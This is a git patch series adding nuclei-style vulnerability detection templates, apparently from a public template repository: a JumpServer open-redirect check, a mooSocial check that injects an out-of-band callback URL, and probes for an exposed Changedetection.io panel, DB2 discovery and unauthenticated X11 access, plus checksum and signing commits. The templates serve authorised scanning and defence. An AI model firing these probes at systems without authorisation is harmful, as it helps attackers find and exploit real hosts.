100644 index 0000000000..7b906aabe4 --- /dev/null +++ b/http/cves/2024/CVE-2024-24763.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-24763 + +info: + name: JumpServer < 3.10.0 - Open Redirect + author: ritikchaddha + severity: medium + description: | + JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available. + reference: + - https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5 + - https://nvd.nist.gov/vuln/detail/CVE-2024-24763 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L + cvss-score: 4.3 + cve-id: CVE-2024-24763 + cwe-id: CWE-601 + cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fit2cloud + product: jumpserver + fofa-query: + - title="JumpServer" + - title="jumpserver" + tags: cve2024,cve,jumpserver,redirect,fit2cloud,authenticated + +http: + - raw: + - | + POST /{{paths}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + payloads: + paths: + - "core/auth/login/?next=//oast.me" + - "auth/login/?next=//oast.me" + - "login/?next=//oast.me" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' From ce44fd5a70fced74074e41234a048fc59f16a98f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:08:32 +0530 Subject: [PATCH 1800/1841] Create CVE-2023-43323.yaml --- http/cves/2023/CVE-2023-43323.yaml | 63 ++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43323.yaml diff --git a/http/cves/2023/CVE-2023-43323.yaml b/http/cves/2023/CVE-2023-43323.yaml new file mode 100644 index 0000000000..1666dcce0a --- /dev/null +++ b/http/cves/2023/CVE-2023-43323.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-43323 + +info: + name: mooSocial 3.1.8 - External Service Interaction + author: ritikchaddha + severity: medium + description: | + mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function. + impact: | + An attacker can exploit this vulnerability to interact with external services. + remediation: | + Upgrade to a patched version of mooSocial to mitigate CVE-2023-43323. + reference: + - https://github.com/ahrixia/CVE-2023-43323 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://nvd.nist.gov/vuln/detail/CVE-2023-43323 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2023-43323 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: moosocial + product: moostore + shodan-query: http.favicon.hash:702863115clear + fofa-query: + - mooSocial + - moosocial + - icon_hash="702863115" + tags: cve,cve2023,moosocial,oast + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - "mooConfig" + internal: true + + - raw: + - | + POST /activities/ajax_share HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + [data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1] + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" From 451eac3e776f9aa5fd20d50b865e13b3d8965cfc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:16:56 +0530 Subject: [PATCH 1801/1841] Create changedetection-unauth.yaml --- .../changedetection-unauth.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/changedetection-unauth.yaml diff --git a/http/misconfiguration/changedetection-unauth.yaml b/http/misconfiguration/changedetection-unauth.yaml new file mode 100644 index 0000000000..989db4b97d --- /dev/null +++ b/http/misconfiguration/changedetection-unauth.yaml @@ -0,0 +1,32 @@ +id: changedetection-unauth + +info: + name: Changedetection.io Dashboard - Exposure + author: ritikchaddha + severity: medium + description: | + Changedetection.io unauth panel detected. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Change Detection" + tags: changedetection,unauth,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SETTINGS
    ' + - 'Change Detection' + condition: and + case-insensitive: true + + - type: status + status: + - 200 From 2ba555fb8d913ca5c81ff9a1d4ea6b32d043dda8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 08:57:31 +0000 Subject: [PATCH 1803/1841] Auto Generated Templates Checksum [Thu Aug 1 08:57:31 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1c47a205c4..b33d9df864 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3355,7 +3355,7 @@ http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 -http/cves/2023/CVE-2023-5222.yaml:8bc7f580ccca2609792ecc60285ec1716d4c2c35 +http/cves/2023/CVE-2023-5222.yaml:741a4666825e65ee645aaeec0740dc6f63fbd537 http/cves/2023/CVE-2023-52251.yaml:4ca51f181f6db2932a1254864b5544ae056d8c88 http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 @@ -3545,7 +3545,7 @@ http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c -http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 +http/default-logins/abb/cs141-default-login.yaml:9253c508b01a0f209fcff3a51daae99417304a7a http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa911e9caccb31fc65f http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b @@ -8948,7 +8948,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:58e12f02e2f66ec3074310e1cc9a626e78570a64 +templates-checksum.txt:746226f00c9586db391b6de02a5a799f94863c22 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 7c71421f7bb9e3f77aff2daf1a25d5f157a9f037 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 08:59:03 +0000 Subject: [PATCH 1804/1841] Auto Template Signing [Thu Aug 1 08:59:03 UTC 2024] :robot: --- http/default-logins/abb/cs141-default-login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/default-logins/abb/cs141-default-login.yaml b/http/default-logins/abb/cs141-default-login.yaml index 92de98ea9f..2de08ea9a8 100644 --- a/http/default-logins/abb/cs141-default-login.yaml +++ b/http/default-logins/abb/cs141-default-login.yaml @@ -60,5 +60,4 @@ http: - type: kval kval: - accessToken - -# digest: 4a0a00473045022100d7669b05e2b655bf42189bd5a1f1c6d312b55ef0f2226d74125a06af7716cb4c02200e5bbd064a3fa4485e6a2e29f0df4dae44e75252a08137974489591ca8e284c5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100adf8a4c12e354461e80b4a00ab99ae10c5b82fefee98c10029107b3d2063620f022060eb930abe08c48fa92c7e817046a6a999feabe76aff9b2e6052a78f877c6e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8e608c31e4b1e151acd1cd2d4a3344f6d3e1ac6d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:32:24 +0530 Subject: [PATCH 1805/1841] Create db2-discover.yaml --- javascript/udp/detection/db2-discover.yaml | 56 ++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 javascript/udp/detection/db2-discover.yaml diff --git a/javascript/udp/detection/db2-discover.yaml b/javascript/udp/detection/db2-discover.yaml new file mode 100644 index 0000000000..5d962a6af1 --- /dev/null +++ b/javascript/udp/detection/db2-discover.yaml @@ -0,0 +1,56 @@ +id: db2-discover + +info: + name: Broadcast DB2 Discover + author: pussycat0x + severity: info + description: | + Attempts to discover DB2 servers on the network by sending a broadcast request to port 523/udp. + reference: + - https://nmap.org/nsedoc/scripts/broadcast-db2-discover.html + metadata: + shodan-query: port:523 + tags: ibm,network,js,udp + +javascript: + - pre-condition: | + isUDPPortOpen(Host,Port); + code: | + let packet = bytes.NewBuffer(); + const c = require("nuclei/net"); + const cmd = "DB2GETADDR\0SQL09010\0" + packet.WriteString(cmd) + let conn = c.Open('udp', `${Host}:${Port}`); + conn.SendHex(packet.Hex()); + const result = conn.RecvString() + const cleanedString = result.replace(/\x00/g, ''); + let combinedResult; + + if (cleanedString.includes("DB2RETADDRSQL")) { + + const regex = /^DB2RETADDRSQL(\d{2})(\d{2})(\d{1})(.*)$/; + const matches = cleanedString.match(regex); + + const formattedNumber = matches ? `${matches[1]}.${matches[2]}.${matches[3]}` : ''; + const hostname = matches ? matches[4] : ''; + + combinedResult = `Db2 Version: ${formattedNumber}, Hostname: ${hostname}`; + + } else { + conn.Close(); + } + combinedResult; + + args: + Host: "{{Host}}" + Port: 523 + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: dsl + dsl: + - response From dfd6d5cbd40bcd14ebf17611a4e5093f8d1f6782 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:36:53 +0530 Subject: [PATCH 1806/1841] Create x11-unauth-access.yaml --- .../x11/x11-unauth-access.yaml | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 javascript/misconfiguration/x11/x11-unauth-access.yaml diff --git a/javascript/misconfiguration/x11/x11-unauth-access.yaml b/javascript/misconfiguration/x11/x11-unauth-access.yaml new file mode 100644 index 0000000000..2305b2f82c --- /dev/null +++ b/javascript/misconfiguration/x11/x11-unauth-access.yaml @@ -0,0 +1,44 @@ +id: x11-unauth-access + +info: + name: x11 - Unauthenticated + author: pussycat0x + severity: high + description: | + To check if you can connect to a remote X server, send an X11 initial connection request to TCP port 6000+n (where n is the display number). The response success byte (0x00 or 0x01) indicates if you are allowed; if successful, the script will display "X server access is granted," confirming that an attacker can connect to the X server + reference: + - https://nmap.org/nsedoc/scripts/x11-access.html + - https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11 + - https://www.hackingarticles.in/penetration-testing-on-x11-server/ + tags: x11,network,js,remote,unauth + +javascript: + - pre-condition: | + isPortOpen(Host,Port); + code: | + let packet = bytes.NewBuffer(); + const c = require("nuclei/net"); + const cmd = "l\u0000\u000b\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000" + packet.WriteString(cmd) + let conn = c.Open('tcp', `${Host}:${Port}`); + conn.SendHex(packet.Hex()); + const result = conn.RecvFull(); + + let accessGranted; + + if (result[0] === 1) { + accessGranted = true; + } else { + conn.Close(); + } + + accessGranted + + args: + Host: "{{Host}}" + Port: 6000 + + matchers: + - type: dsl + dsl: + - response From 0789b884de6a5d655da1ae09b3f3fa9604fa2e58 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 09:53:52 +0000 Subject: [PATCH 1807/1841] Auto Generated New Template Addition List [Thu Aug 1 09:53:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 576ef8add6..826e1449da 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2022/CVE-2022-27043.yaml +http/cves/2023/CVE-2023-43323.yaml http/cves/2023/CVE-2023-44393.yaml http/cves/2023/CVE-2023-5222.yaml http/cves/2024/CVE-2024-39903.yaml From 5d97b2b8d3278f1cf05dfd9bcc81a7c01283672a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 09:54:03 +0000 Subject: [PATCH 1808/1841] Auto Generated Templates Checksum [Thu Aug 1 09:54:03 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b33d9df864..db22f19b5f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3293,6 +3293,7 @@ http/cves/2023/CVE-2023-43177.yaml:0605e78cef73e2c3e0ce29c115e4bf8028a16c7a http/cves/2023/CVE-2023-43187.yaml:dbb0d7b9be18eb24fd7858deccbdd2824fb2f204 http/cves/2023/CVE-2023-43208.yaml:462628870cee32dc0dccd7ed2d329f54ac90d917 http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 +http/cves/2023/CVE-2023-43323.yaml:2e5bd5bf809768cf84ece72055527e19c9ccb016 http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d http/cves/2023/CVE-2023-43374.yaml:e776da19a0b00d4c913d7c1b0beab3657841b351 @@ -3545,7 +3546,7 @@ http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c -http/default-logins/abb/cs141-default-login.yaml:9253c508b01a0f209fcff3a51daae99417304a7a +http/default-logins/abb/cs141-default-login.yaml:7459372f8a0210fab32ec1c2e3672256bc8ba14a http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa911e9caccb31fc65f http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b @@ -8948,7 +8949,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:746226f00c9586db391b6de02a5a799f94863c22 +templates-checksum.txt:0ff909d43e98093675aad0309dcbae93fd5cc02f vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 021cf64116fee549731e837a791f489fd22669d5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 09:54:45 +0000 Subject: [PATCH 1809/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f583462847..a9b959c86b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-27043.yaml' + - 'http/cves/2023/CVE-2023-43323.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2023/CVE-2023-5222.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' From 594ef2f5dcba3213f6b571080eafeb5ec45a730f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 09:55:36 +0000 Subject: [PATCH 1810/1841] Auto Template Signing [Thu Aug 1 09:55:36 UTC 2024] :robot: --- http/cves/2023/CVE-2023-43323.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-43323.yaml b/http/cves/2023/CVE-2023-43323.yaml index 1666dcce0a..0230986980 100644 --- a/http/cves/2023/CVE-2023-43323.yaml +++ b/http/cves/2023/CVE-2023-43323.yaml @@ -61,3 +61,4 @@ http: words: - "http" - "dns" +# digest: 4b0a00483046022100af09f14a1bcd4be57e652230a0edeb33311aa7089079b7b43a89ab4d6e5d2828022100fa18b8c9cd1e37934659cad5d0a55252f7a75aeb4e9e84d7fa33b68f17c6c97d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 750e024016021b44523c49794ba86a253bce464c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:05:36 +0000 Subject: [PATCH 1811/1841] Auto Generated New Template Addition List [Thu Aug 1 10:05:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 826e1449da..bf6aef5c0c 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-43323.yaml http/cves/2023/CVE-2023-44393.yaml http/cves/2023/CVE-2023-5222.yaml +http/cves/2024/CVE-2024-34061.yaml http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-39907.yaml http/cves/2024/CVE-2024-6205.yaml From de55b7f4827bb7e490a45a4f520b1beae03c83b5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:05:41 +0000 Subject: [PATCH 1812/1841] Auto Generated Templates Checksum [Thu Aug 1 10:05:41 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index db22f19b5f..6fa7aff90b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3293,7 +3293,7 @@ http/cves/2023/CVE-2023-43177.yaml:0605e78cef73e2c3e0ce29c115e4bf8028a16c7a http/cves/2023/CVE-2023-43187.yaml:dbb0d7b9be18eb24fd7858deccbdd2824fb2f204 http/cves/2023/CVE-2023-43208.yaml:462628870cee32dc0dccd7ed2d329f54ac90d917 http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 -http/cves/2023/CVE-2023-43323.yaml:2e5bd5bf809768cf84ece72055527e19c9ccb016 +http/cves/2023/CVE-2023-43323.yaml:5183007ec76bec6426ec05e856fa9449e058935a http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d http/cves/2023/CVE-2023-43374.yaml:e776da19a0b00d4c913d7c1b0beab3657841b351 @@ -3486,6 +3486,7 @@ http/cves/2024/CVE-2024-33605.yaml:073678cce93693a49cdbf61160717cff11e51f54 http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 +http/cves/2024/CVE-2024-34061.yaml:da7614ca17ae070623437e3d94a2d4f97faa9efb http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b http/cves/2024/CVE-2024-34257.yaml:d015db9c6ce1d3c60d6ff5245d76e6aa7f7ecaf4 http/cves/2024/CVE-2024-34351.yaml:0b871adb6b9e887987000e89999f1de41647ddcb @@ -8949,7 +8950,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0ff909d43e98093675aad0309dcbae93fd5cc02f +templates-checksum.txt:11f98f8081e81e31cf9f66ca6d741003e367791c vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 17ae4e84f06e37d6a03b0d9fada3a6279e3ffbb0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:06:18 +0000 Subject: [PATCH 1813/1841] Auto Generated New Template Addition List [Thu Aug 1 10:06:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bf6aef5c0c..b1f4600ab2 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ http/cves/2024/CVE-2024-6396.yaml http/cves/2024/CVE-2024-6922.yaml http/cves/2024/CVE-2024-7120.yaml http/cves/2024/CVE-2024-7188.yaml +http/misconfiguration/changedetection-unauth.yaml http/misconfiguration/deployment-interface-exposed.yaml http/misconfiguration/installer/quickcms-installer.yaml http/misconfiguration/manage-cabinet-register.yaml From 2c178122cf0d74d90d8004ce244d7a8122cfa35d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:06:22 +0000 Subject: [PATCH 1814/1841] Auto Generated Templates Checksum [Thu Aug 1 10:06:22 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6fa7aff90b..654f3f3495 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5562,6 +5562,7 @@ http/misconfiguration/browserless-debugger.yaml:c0e3296fa2d52ff89e0346546043721a http/misconfiguration/cadvisor-exposure.yaml:d236dc86e5e131b98b7c5c5f24d85e219448a249 http/misconfiguration/casdoor-users-password.yaml:bec0721cb2860bc3be2725338624cbeaadb20e1d http/misconfiguration/cgi-test-page.yaml:ce97987c25f63e9ef113fc09ddc2daf5a98c666c +http/misconfiguration/changedetection-unauth.yaml:071cf4423da1b833d7dbc7d4669943e388272534 http/misconfiguration/chatgpt-web-unauth.yaml:723a53934bc70af11866cc57d2cc46c3cf5ae119 http/misconfiguration/clickhouse-unauth-api.yaml:50981e20ce91e8483c828bc8dc08342b593c8404 http/misconfiguration/clockwork-dashboard-exposure.yaml:560363ab2aa0f4ee66a559fcd79af2a25a1ec3f3 @@ -8950,7 +8951,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:11f98f8081e81e31cf9f66ca6d741003e367791c +templates-checksum.txt:2f38a0a62a87faea798a1bf7d93ff3fe454b1bcd vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From a13e1eed84053c33a56e4ba756ad674d1c41205c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:06:24 +0000 Subject: [PATCH 1815/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a9b959c86b..c68e788acd 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-43323.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2023/CVE-2023-5222.yaml' + - 'http/cves/2024/CVE-2024-34061.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-39907.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' From e985584e3bbb46af869c7265de8a5f8560803671 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:07:14 +0000 Subject: [PATCH 1816/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c68e788acd..b6ad0100c9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,6 +16,7 @@ on: - 'http/cves/2024/CVE-2024-6922.yaml' - 'http/cves/2024/CVE-2024-7120.yaml' - 'http/cves/2024/CVE-2024-7188.yaml' + - 'http/misconfiguration/changedetection-unauth.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' - 'http/misconfiguration/installer/quickcms-installer.yaml' - 'http/misconfiguration/manage-cabinet-register.yaml' From 47cd95972d5ac2f5cb868831297e838a373174a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:07:30 +0000 Subject: [PATCH 1817/1841] Auto Template Signing [Thu Aug 1 10:07:30 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34061.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-34061.yaml b/http/cves/2024/CVE-2024-34061.yaml index 8796781bac..cfdf3bafe9 100644 --- a/http/cves/2024/CVE-2024-34061.yaml +++ b/http/cves/2024/CVE-2024-34061.yaml @@ -60,3 +60,4 @@ http: regex: - 'name="csrf_token" value="([^"]+)"' internal: true +# digest: 4b0a00483046022100a26d7a719f6bde174ab2a4ce1f996610abd24a3fe1dd22367ddfad90424a604a022100ceb749dac5236c2e827d447cb1709f0895ce46da346dead8eb19b2634d6ab9f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 455ab189f7c14f5377de3fee9af16edbd6a24b26 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 10:07:50 +0000 Subject: [PATCH 1818/1841] Auto Generated New Template Addition List [Thu Aug 1 10:07:50 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b1f4600ab2..96e12e24fb 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-43323.yaml http/cves/2023/CVE-2023-44393.yaml http/cves/2023/CVE-2023-5222.yaml +http/cves/2024/CVE-2024-24763.yaml http/cves/2024/CVE-2024-34061.yaml http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-39907.yaml From ed5dda4c20ac927d7396fc2d7f1ab9c774890521 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 10:07:55 +0000 Subject: [PATCH 1819/1841] Auto Generated Templates Checksum [Thu Aug 1 10:07:55 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 654f3f3495..be411e29a9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3435,6 +3435,7 @@ http/cves/2024/CVE-2024-23917.yaml:51738979be19460f2365f47d3eb2eac50d627cb2 http/cves/2024/CVE-2024-24112.yaml:02f1d93189f81a45341e7a2c2bff5f935df70204 http/cves/2024/CVE-2024-24131.yaml:c54d93f7316eb7bfd899c9f03f8a693942e9ec9c 